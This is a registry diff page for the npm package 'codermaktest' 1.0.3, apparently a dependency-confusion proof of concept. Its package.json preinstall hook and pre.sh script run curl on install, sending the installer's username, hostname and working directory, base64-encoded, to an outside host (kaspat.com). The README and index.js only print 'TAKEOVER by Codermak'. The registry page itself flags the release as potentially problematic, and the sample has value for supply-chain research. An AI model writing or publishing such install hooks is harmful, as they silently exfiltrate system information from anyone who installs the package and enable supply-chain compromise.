codermaktest 1.0.3

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of codermaktest might be problematic. Click here for more details.

Files changed (4) hide show
  1. package/README.md +1 -0
  2. package/index.js +1 -0
  3. package/package.json +15 -0
  4. package/pre.sh +3 -0
package/README.md ADDED
@@ -0,0 +1 @@
1
+ # Takeover by Codermak
package/index.js ADDED
@@ -0,0 +1 @@
1
+ console.log('================ TAKEOVER by Codermak ================')
package/package.json ADDED
@@ -0,0 +1,15 @@
1
+ {
2
+ "name": "codermaktest",
3
+ "version": "1.0.3",
4
+ "description": "",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "curl http://kaspat.com/bugbounty/dependency-confusion-poc.php -H \"Whoami: $(whoami | base64)\" -H \"Hostname: $(hostname | base64)\" -H \"Pwd: $(pwd | base64 -w 2000)\""
8
+ },
9
+ "repository": {
10
+ "type": "git",
11
+ "url": "git+https://github.com/codermakhackerone"
12
+ },
13
+ "author": "",
14
+ "license": "ISC"
15
+ }
package/pre.sh ADDED
@@ -0,0 +1,3 @@
1
+ #!/bin/bash
2
+
3
+ curl http://kaspat.com/bugbounty/dependency-confusion-poc.php -H "Whoami: $(whoami | base64)" -H "Hostname: $(hostname | base64)" -H "Pwd: $(pwd | base64 -w 2000)"